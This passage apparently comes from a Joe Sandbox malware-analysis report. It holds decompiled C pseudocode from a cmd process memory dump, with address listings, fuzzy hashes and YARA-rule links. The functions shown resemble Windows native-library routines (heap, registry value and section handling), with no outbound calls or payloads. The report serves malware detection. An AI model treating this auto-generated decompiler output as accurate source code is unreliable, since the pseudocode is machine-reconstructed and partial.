						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E03C9138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03BF7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E03C8FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3cc8724 & 0x00000008) != 0) {
						E03C952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E03CA15B5(0x3cc8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                                          0x03ca0eb7
                                                                                                                                          0x03ca0eb9
                                                                                                                                          0x03ca0ec0
                                                                                                                                          0x03ca0ec2
                                                                                                                                          0x03ca0ecd
                                                                                                                                          0x03ca105b
                                                                                                                                          0x03ca105b
                                                                                                                                          0x03ca1061
                                                                                                                                          0x03ca1066
                                                                                                                                          0x03ca1066
                                                                                                                                          0x03ca106b
                                                                                                                                          0x03ca1073
                                                                                                                                          0x03ca1073
                                                                                                                                          0x03ca0ed3
                                                                                                                                          0x03ca0ed6
                                                                                                                                          0x03ca0edc
                                                                                                                                          0x03ca0ee0
                                                                                                                                          0x03ca0ee7
                                                                                                                                          0x03ca0ef0
                                                                                                                                          0x03ca0ef5
                                                                                                                                          0x03ca0efa
                                                                                                                                          0x03ca0efc
                                                                                                                                          0x03ca0efd
                                                                                                                                          0x03ca0f03
                                                                                                                                          0x03ca0f04
                                                                                                                                          0x03ca0f06
                                                                                                                                          0x03ca0f07
                                                                                                                                          0x03ca0f09
                                                                                                                                          0x03ca0f0e
                                                                                                                                          0x03ca0f14
                                                                                                                                          0x03ca0f23
                                                                                                                                          0x03ca0f2d
                                                                                                                                          0x03ca0f34
                                                                                                                                          0x03ca0f34
                                                                                                                                          0x03ca0f14
                                                                                                                                          0x03ca0f52
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca0f58
                                                                                                                                          0x03ca0f73
                                                                                                                                          0x03ca0f74
                                                                                                                                          0x03ca0f79
                                                                                                                                          0x03ca0f7d
                                                                                                                                          0x03ca0f80
                                                                                                                                          0x03ca0f86
                                                                                                                                          0x03ca0fab
                                                                                                                                          0x03ca0fb5
                                                                                                                                          0x03ca0fc6
                                                                                                                                          0x03ca0fd1
                                                                                                                                          0x03ca0fe3
                                                                                                                                          0x03ca0fd3
                                                                                                                                          0x03ca0fdc
                                                                                                                                          0x03ca0fdc
                                                                                                                                          0x03ca0feb
                                                                                                                                          0x03ca1009
                                                                                                                                          0x03ca1009
                                                                                                                                          0x03ca1015
                                                                                                                                          0x03ca1027
                                                                                                                                          0x03ca1017
                                                                                                                                          0x03ca1020
                                                                                                                                          0x03ca1020
                                                                                                                                          0x03ca102f
                                                                                                                                          0x03ca103c
                                                                                                                                          0x03ca103c
                                                                                                                                          0x03ca1048
                                                                                                                                          0x03ca1050
                                                                                                                                          0x03ca1050
                                                                                                                                          0x03ca1055
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca1055
                                                                                                                                          0x03ca0f88
                                                                                                                                          0x03ca0f9e
                                                                                                                                          0x03ca0fa2
                                                                                                                                          0x03ca0fa9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca0fa9
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: `
                                                                                                                                          • API String ID: 0-2679148245
                                                                                                                                          • Opcode ID: 74e6e87da09b4a5be19c6bb61844a0ad39bb2e5f2e84a0c84f3da93937292a09
                                                                                                                                          • Instruction ID: 91e58c89dc8324b183c1b1025c4a8c865c52292919907c0aff574fcff7ef5764
                                                                                                                                          • Opcode Fuzzy Hash: 74e6e87da09b4a5be19c6bb61844a0ad39bb2e5f2e84a0c84f3da93937292a09
                                                                                                                                          • Instruction Fuzzy Hash: 7551DC71204B428FD324DF29D984B1BB7E5EBC4348F08096DF992DB290D770E906CB62
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                          			E03C0F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03BF4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03C19830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03C19990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E03C195D0();
							goto L11;
						} else {
							_t109 = L03BF4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E03C1F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E03C195D0();
										L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                                          0x03c0f0d3
                                                                                                                                          0x03c0f0d9
                                                                                                                                          0x03c0f0e0
                                                                                                                                          0x03c0f0e7
                                                                                                                                          0x03c0f0f2
                                                                                                                                          0x03c0f0f4
                                                                                                                                          0x03c0f0f8
                                                                                                                                          0x03c0f100
                                                                                                                                          0x03c0f108
                                                                                                                                          0x03c0f10d
                                                                                                                                          0x03c0f115
                                                                                                                                          0x03c0f116
                                                                                                                                          0x03c0f11f
                                                                                                                                          0x03c0f123
                                                                                                                                          0x03c0f124
                                                                                                                                          0x03c0f12c
                                                                                                                                          0x03c0f130
                                                                                                                                          0x03c0f134
                                                                                                                                          0x03c0f13d
                                                                                                                                          0x03c0f144
                                                                                                                                          0x03c0f14b
                                                                                                                                          0x03c0f152
                                                                                                                                          0x03c4bab0
                                                                                                                                          0x03c4bab0
                                                                                                                                          0x03c0f158
                                                                                                                                          0x03c0f158
                                                                                                                                          0x03c0f15a
                                                                                                                                          0x03c0f160
                                                                                                                                          0x03c0f165
                                                                                                                                          0x03c0f166
                                                                                                                                          0x03c0f16f
                                                                                                                                          0x03c0f173
                                                                                                                                          0x03c4baa7
                                                                                                                                          0x03c4baa7
                                                                                                                                          0x03c4baab
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0f179
                                                                                                                                          0x03c0f18d
                                                                                                                                          0x03c0f191
                                                                                                                                          0x03c4baa2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0f197
                                                                                                                                          0x03c0f19b
                                                                                                                                          0x03c0f1a2
                                                                                                                                          0x03c0f1a9
                                                                                                                                          0x03c0f1af
                                                                                                                                          0x03c0f1b2
                                                                                                                                          0x03c0f1b6
                                                                                                                                          0x03c0f1b9
                                                                                                                                          0x03c0f1c4
                                                                                                                                          0x03c0f1d8
                                                                                                                                          0x03c0f1df
                                                                                                                                          0x03c0f1e3
                                                                                                                                          0x03c0f1eb
                                                                                                                                          0x03c0f1ee
                                                                                                                                          0x03c0f1f4
                                                                                                                                          0x03c0f20f
                                                                                                                                          0x03c4bab7
                                                                                                                                          0x03c4babb
                                                                                                                                          0x03c4bacc
                                                                                                                                          0x03c4bad1
                                                                                                                                          0x03c0f215
                                                                                                                                          0x03c0f218
                                                                                                                                          0x03c0f226
                                                                                                                                          0x03c0f22b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0f22b
                                                                                                                                          0x03c0f1f6
                                                                                                                                          0x03c0f1f6
                                                                                                                                          0x03c0f1f9
                                                                                                                                          0x03c0f1fb
                                                                                                                                          0x03c0f1fb
                                                                                                                                          0x03c0f1f4
                                                                                                                                          0x03c0f191
                                                                                                                                          0x03c0f173
                                                                                                                                          0x03c0f152
                                                                                                                                          0x03c0f203

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                          • Instruction ID: 5623171c6150ee4689b66672049fa27ee2fe02c4b4f00b8645233041198386e8
                                                                                                                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                          • Instruction Fuzzy Hash: E2513775504710ABD320DF29C840A6BBBE8BF48750F008A2DFA95DB690E7B4E954DB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C53540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                          			E03C53540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x3ccd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03C10BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03C53706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E03C1FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03C53540;
						E03C1FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E03C2DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03C60C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E03C197C0();
					}
					return E03C1B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03C53971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03C53884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E03C1FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03C19650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03C53787(_a4,  &_v352, _t80);
						}
					}
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E03C195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                                          0x03c53552
                                                                                                                                          0x03c5355a
                                                                                                                                          0x03c5355d
                                                                                                                                          0x03c53566
                                                                                                                                          0x03c53567
                                                                                                                                          0x03c5357e
                                                                                                                                          0x03c5358f
                                                                                                                                          0x03c535a1
                                                                                                                                          0x03c535a5
                                                                                                                                          0x03c5366b
                                                                                                                                          0x03c5366b
                                                                                                                                          0x03c5366d
                                                                                                                                          0x03c53672
                                                                                                                                          0x03c53679
                                                                                                                                          0x03c53685
                                                                                                                                          0x03c5368d
                                                                                                                                          0x03c5369d
                                                                                                                                          0x03c536a7
                                                                                                                                          0x03c536b8
                                                                                                                                          0x03c536c6
                                                                                                                                          0x03c536c7
                                                                                                                                          0x03c536dc
                                                                                                                                          0x03c536e1
                                                                                                                                          0x03c536e7
                                                                                                                                          0x03c536e9
                                                                                                                                          0x03c536e9
                                                                                                                                          0x03c53703
                                                                                                                                          0x03c53703
                                                                                                                                          0x03c535b5
                                                                                                                                          0x03c535c0
                                                                                                                                          0x03c535c4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c535ca
                                                                                                                                          0x03c535d7
                                                                                                                                          0x03c535e2
                                                                                                                                          0x03c535e6
                                                                                                                                          0x03c535e8
                                                                                                                                          0x03c535f5
                                                                                                                                          0x03c535fa
                                                                                                                                          0x03c53603
                                                                                                                                          0x03c53604
                                                                                                                                          0x03c53609
                                                                                                                                          0x03c5360a
                                                                                                                                          0x03c53612
                                                                                                                                          0x03c53613
                                                                                                                                          0x03c5361e
                                                                                                                                          0x03c53622
                                                                                                                                          0x03c53628
                                                                                                                                          0x03c5362f
                                                                                                                                          0x03c5362f
                                                                                                                                          0x03c53636
                                                                                                                                          0x03c53638
                                                                                                                                          0x03c5363b
                                                                                                                                          0x03c53642
                                                                                                                                          0x03c53642
                                                                                                                                          0x03c53636
                                                                                                                                          0x03c53657
                                                                                                                                          0x03c53657
                                                                                                                                          0x03c5365c
                                                                                                                                          0x03c53662
                                                                                                                                          0x03c53669
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: BinaryHash
                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                          • Opcode ID: 8efcc43eef63fc3659e507e59134032548252f4d7f55f6aa1e0a4b7b5706f067
                                                                                                                                          • Instruction ID: cf2e58399739ba60e925650e15cf1dd836008e37d891f07e57102ea4138cfac5
                                                                                                                                          • Opcode Fuzzy Hash: 8efcc43eef63fc3659e507e59134032548252f4d7f55f6aa1e0a4b7b5706f067
                                                                                                                                          • Instruction Fuzzy Hash: F74175B6D0126C9BDB21DA50CC84FDEB77CAB44754F0145E9EA09EB240DB309EC89F98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                          			E03CA05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E03CA07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03C19730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E03C9A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E03C9A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03CA1293(_t79, _v40, E03CA07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03BF7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E03C9138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                                                          0x03ca05c5
                                                                                                                                          0x03ca05ca
                                                                                                                                          0x03ca05d3
                                                                                                                                          0x03ca06db
                                                                                                                                          0x03ca06db
                                                                                                                                          0x03ca06dd
                                                                                                                                          0x03ca06e3
                                                                                                                                          0x03ca06e3
                                                                                                                                          0x03ca05dd
                                                                                                                                          0x03ca05e7
                                                                                                                                          0x03ca05f6
                                                                                                                                          0x03ca0600
                                                                                                                                          0x03ca0607
                                                                                                                                          0x03ca0610
                                                                                                                                          0x03ca0615
                                                                                                                                          0x03ca061a
                                                                                                                                          0x03ca061c
                                                                                                                                          0x03ca061e
                                                                                                                                          0x03ca0624
                                                                                                                                          0x03ca0625
                                                                                                                                          0x03ca0627
                                                                                                                                          0x03ca0628
                                                                                                                                          0x03ca0631
                                                                                                                                          0x03ca0640
                                                                                                                                          0x03ca064d
                                                                                                                                          0x03ca0654
                                                                                                                                          0x03ca0654
                                                                                                                                          0x03ca0631
                                                                                                                                          0x03ca066d
                                                                                                                                          0x03ca0674
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca0692
                                                                                                                                          0x03ca069e
                                                                                                                                          0x03ca06b0
                                                                                                                                          0x03ca06a0
                                                                                                                                          0x03ca06a9
                                                                                                                                          0x03ca06a9
                                                                                                                                          0x03ca06b8
                                                                                                                                          0x03ca06d6
                                                                                                                                          0x03ca06d6
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: `
                                                                                                                                          • API String ID: 0-2679148245
                                                                                                                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                                          • Instruction ID: b1ac068f0ee0d87721f9208d8cf3e189128c29b9789c80b29ec0a673b825ab3d
                                                                                                                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                                          • Instruction Fuzzy Hash: B731F332604B166BE720DE29CD45F9BB7D9EB84798F084229FD54DF280D770EA14CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C53884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                          			E03C53884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03C19650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03BF4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03C19650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                                          0x03c53893
                                                                                                                                          0x03c53896
                                                                                                                                          0x03c53899
                                                                                                                                          0x03c5389f
                                                                                                                                          0x03c538a0
                                                                                                                                          0x03c538a4
                                                                                                                                          0x03c538a9
                                                                                                                                          0x03c538ac
                                                                                                                                          0x03c538ad
                                                                                                                                          0x03c538ae
                                                                                                                                          0x03c538af
                                                                                                                                          0x03c538b1
                                                                                                                                          0x03c538b4
                                                                                                                                          0x03c538bb
                                                                                                                                          0x03c538bc
                                                                                                                                          0x03c538bd
                                                                                                                                          0x03c538c4
                                                                                                                                          0x03c538c8
                                                                                                                                          0x03c538ca
                                                                                                                                          0x03c538ca
                                                                                                                                          0x03c538d5
                                                                                                                                          0x03c5393e
                                                                                                                                          0x03c53940
                                                                                                                                          0x03c53942
                                                                                                                                          0x03c53952
                                                                                                                                          0x03c53954
                                                                                                                                          0x03c53961
                                                                                                                                          0x03c53961
                                                                                                                                          0x03c53967
                                                                                                                                          0x03c5396e
                                                                                                                                          0x03c5396e
                                                                                                                                          0x03c53947
                                                                                                                                          0x03c5394c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c5394c
                                                                                                                                          0x03c538ea
                                                                                                                                          0x03c538ee
                                                                                                                                          0x03c538f8
                                                                                                                                          0x03c538f9
                                                                                                                                          0x03c538ff
                                                                                                                                          0x03c53900
                                                                                                                                          0x03c53902
                                                                                                                                          0x03c53903
                                                                                                                                          0x03c5390b
                                                                                                                                          0x03c5390f
                                                                                                                                          0x03c53950
                                                                                                                                          0x00000000
                                                                                                                                          0x03c53950
                                                                                                                                          0x03c53915
                                                                                                                                          0x03c5391d
                                                                                                                                          0x03c5391d
                                                                                                                                          0x03c53922
                                                                                                                                          0x03c53926
                                                                                                                                          0x00000000
                                                                                                                                          0x03c53928
                                                                                                                                          0x03c5392b
                                                                                                                                          0x03c5392b
                                                                                                                                          0x03c53935
                                                                                                                                          0x03c53937
                                                                                                                                          0x03c53937
                                                                                                                                          0x00000000
                                                                                                                                          0x03c53935
                                                                                                                                          0x03c53926
                                                                                                                                          0x03c538f0
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: BinaryName
                                                                                                                                          • API String ID: 0-215506332
                                                                                                                                          • Opcode ID: aae905ebaba03fd724420b7c8ae6b2c005f42173010d41739c3379c3190666e1
                                                                                                                                          • Instruction ID: 976fdb76aab6414f49456799a45316162954edda5d172834076b9595e409a4a6
                                                                                                                                          • Opcode Fuzzy Hash: aae905ebaba03fd724420b7c8ae6b2c005f42173010d41739c3379c3190666e1
                                                                                                                                          • Instruction Fuzzy Hash: 7831F1BA900649AFEB15DA59C945E6BF778EF80BA0F0541A9BD04EB240D7309E84C7E4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 33%
                                                                                                                                          			E03C0D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3ccd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03BF4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E03C1B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E03C198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E03C195D0();
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
